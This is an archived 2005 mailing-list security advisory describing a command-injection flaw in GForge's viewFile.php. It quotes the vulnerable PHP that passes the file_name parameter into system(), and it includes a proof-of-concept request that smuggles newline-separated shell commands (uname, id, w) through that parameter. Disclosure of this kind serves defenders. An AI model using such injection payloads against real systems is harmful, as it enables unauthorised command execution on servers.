Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Gforge - viewFile.php security flaw

from [Filippo Spike Morelli] Network Security [Permanent Link]
Subject: Gforge - viewFile.php security flaw
Date: Tue, 24 May 2005 12:20:06 +0200 
--------------------------------------------------------------------------
Vendor                          : Gforge (http://gforge.org)
Product                         : gforge
Affected versions       : < 4.0
Bug fixed                       : >= 4.0 & Debian pkg 3.1-30
Vulnerability           : Input validation flaw
Problem-Type            : remote
Severity                        : High, arbitrary command execution

Author                          : Filippo Spike Morelli
--------------------------------------------------------------------------


--------------------------------------------------------------------------
Background
--------------------------------------------------------------------------

GForge helps you manage the entire development life cycle

GForge has tools to help your team collaborate, like message forums and
mailing lists; tools to create and control access to Source Code Management
repositories like CVS and Subversion. GForge automatically creates a
repository and controls access to it depending on the role settings of the
project.

--------------------------------------------------------------------------
Bug Description
--------------------------------------------------------------------------
The scm component shipped with gforge has a bug in the viewFile.php script.
This script is supposed to serve a file info request, outputting its
history, diffs, and all the other relevant info stored in the repository.
There is a flaw in the file_name parameter validation, so a properly
crafted url can lead to arbitrary command execution under the uid the
webserver runs as.

Files involved:
 $GFORGE/www/scm/viewFile.php
 $GFORGE/common/include/cvsweb/RCSHandler.class

The problem is in "file_name" url field not properly validated.

$GFORGE/www/scm/viewFile.php
.....
if($allow)
{
    $DHD = new DirectoryHandler();
    $FHD = new FileHandler();
    $RCH = new RCSHandler();

    $CVSROOT = $GLOBALS['sys_cvsroot_dir'].$cvsroot;
    $DIRNAME = ($file_name != "")?"$file_name":"";
    $DIRNAME = $CVSROOT.$DIRNAME;
....
    $RCSFile = $DIRNAME.",v";
    switch($view_action)
    {
        case "l":
            if(false === $RCH->getRCSLog($RCSFile))
                echo("Error: ".$RCH->getError());
.....

$GFORGE/common/include/cvsweb/RCSHandler.class
RCSHandles class takes care of managing the RCS log and diffs for the
requested
file, and it is there that the malicious code is actually executed.
......
function getRCSLog($RCSFILE,$REV="all")
    {
        $rev = "";
        if($REV != "all")
            $rev = "-r$REV";

        $file = $this->generateTemp();
        $cmd = "rlog $rev $RCSFILE > $file";
        if(false === ($result = system($cmd)))
   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
        {
            $this->setError("Could not execute '$cmd'");
            return false;
        }
.....

by system() the malicious code in $cmd is executed.


--------------------------------------------------------------------------
PoC
--------------------------------------------------------------------------

The analyzed command is "uname -a;id;w"

gforge/xxxx/xx/xx/gforge.log:xxx.xxx.xxx.xxx [xx/xxx/xxxx:xx:xx:xx +xxxx]
"GET /scm/viewFile.php?group_id=11&file_name=%0Auname%20-a;id;w%0a
HTTP/1.1" 200 2977
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Maxthon;
.NET CLR 1.1.4322)"

----- "file_name=%0Auname%20-a;id;w%0a" -----
%0a[A] = hexadecimal code for <return>.
%20 = hexadecimal code for <space>
---> "file_name=<return>uname -a;id;w<return>"

looking at viewFile.php sourcecode:
$DIRNAME = ($file_name != "")?"$file_name":"";
so $DIRNAME = <return>uname -a;id;w<return>
$RCSFile = $DIRNAME.",v";
so $RCSFile = <return>uname -a;id;w<return>,v
...
$cmd = "rlog $rev $RCSFILE > $file";
so $cmd = rlog all <return>uname -a;id;w<return>,v  >  $file

        if(false === ($result = system($cmd)))
and then system executes:

1. rlog all which gives back an error because of the non existing path
2. <return>
3. uname -a;id;w
4. <return>
5. and eventually the last part of the string, ",v", which gives back the
error message "sh: ,v: command not found"

--------------------------------------------------------------------------
Solution
--------------------------------------------------------------------------

The vendor has been contacted and they promptly worked on a fix. At the time 
of writing the debian package available on Sid (gforge  3.1-30) has been 
fixed. As temporary fix it is possible to disable the scm component. Or just 
upgrade to latest version.


regards,

-- 
    Filippo Spike Morelli - Miu-ft System Administrator
            ....................................
         .... follow the white rabbit ....
    ... wait no, follow alice, she's so cute...
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Gforge - viewFile.php security flaw, Filippo Spike Morelli <=
Previous by Date:  Blue Coat Reporter multiple remote vulnerabilities, Oliver Karow
Next by Date:  ACROS Security: HTML Injection in BEA WebLogic Server Console (2), ACROS Security
Previous by Thread:  Blue Coat Reporter multiple remote vulnerabilities, Oliver Karow
Next by Thread:  ACROS Security: HTML Injection in BEA WebLogic Server Console (2), ACROS Security
Indexes:  [Date] [Thread] [Top] [All Lists]